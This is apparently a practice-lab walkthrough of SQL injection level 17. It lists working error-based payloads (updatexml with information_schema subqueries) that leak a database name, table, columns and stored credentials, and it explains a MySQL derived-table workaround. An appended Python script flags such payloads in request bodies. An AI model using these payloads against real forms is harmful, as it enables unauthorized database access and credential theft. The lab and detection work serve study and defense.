• SQLi Level 17


    uname=admin&passwd=admin' and 1=1#&submit=Submit

    uname=admin&passwd=admin' and 1=2#&submit=Submit

    I deeply feel that I have not grasped the essence of SQL injection.

    uname=admin&passwd=admin' order by 1#&submit=Submit

    Unknown column '1' in 'order clause'

    I'm totally confused, why.....

    uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))#&submit=Submit  #XPATH syntax error: '~security~'

    uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&submit=Submit  #XPATH syntax error: '~users~'

    uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1))#&submit=Submit  #XPATH syntax error: '~username~'

    uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1))#&submit=Submit  #XPATH syntax error: '~password~'

    uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select password from users),0x7e),1))#&submit=Submit

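    Failed: You can't specify target table 'users' for update in FROM clause

    You cannot first select values from a table and then update that same table (within the same statement).

    Workaround: wrap the selected result as a derived table and select from it again, which avoids the error.

    Note: this problem only occurs in MySQL; MSSQL and Oracle do not have it.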

    uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select username from users limit 0,1) a),0x7e),1)#&submit=Submit  #XPATH syntax error: '~Dumb~'

    uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select * from (select password from users limit 0,1) a),0x7e),1)#&submit=Submit  #XPATH syntax error: '~Dumb~'
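From the defender's side, the request bodies above are easy to flag in logged POST data. The following is an added example, not part of the original post: a small Python check over the `passwd` field, where the rule names, verdict labels and the two benign sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Rule names are this example's own; patterns mirror the request bodies above.
RULES = {
    "xml_error_fn": re.compile(r"\bupdatexml\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "quote_then_logic": re.compile(r"'\s*(?:and|or|order\s+by)\b"),
    "quote_then_comment": re.compile(r"'.*(?:#|--\s)"),
}
HIGH = {"xml_error_fn", "schema_enum"}  # high-confidence: SQL function / schema names


def normalize(value):
    """Lowercase, drop /* */ comments and collapse whitespace before matching."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)


def inspect_body(body, fields=("passwd",)):
    """Return (verdict, sorted rule hits) for the watched form fields."""
    hits = set()
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in fields:
            text = normalize(value)
            hits |= {rule for rule, rx in RULES.items() if rx.search(text)}
    if hits & HIGH:
        return "block", sorted(hits)
    return ("review" if hits else "ok"), sorted(hits)


# Constructed sample set: four bodies copied from the requests above, two benign.
SAMPLES = [
    "uname=admin&passwd=admin' and 1=1#&submit=Submit",
    "uname=admin&passwd=admin' order by 1#&submit=Submit",
    "uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))#&submit=Submit",
    "uname=admin&passwd=admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1))#&submit=Submit",
    "uname=admin&passwd=N3w-Passw0rd!&submit=Submit",
    "uname=admin&passwd=it's+fine&submit=Submit",
]


def run_samples():
    """Verdict for each sample body, in order."""
    return [inspect_body(body)[0] for body in SAMPLES]


if __name__ == "__main__":
    for body, verdict in zip(SAMPLES, run_samples()):
        print(f"{verdict:6} {body[:60]}")
```

Pattern matching like this is a monitoring aid and will miss or over-flag some inputs; the fix for an injectable UPDATE is a parameterized query.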

  • Original article: https://www.cnblogs.com/llcn/p/12744772.html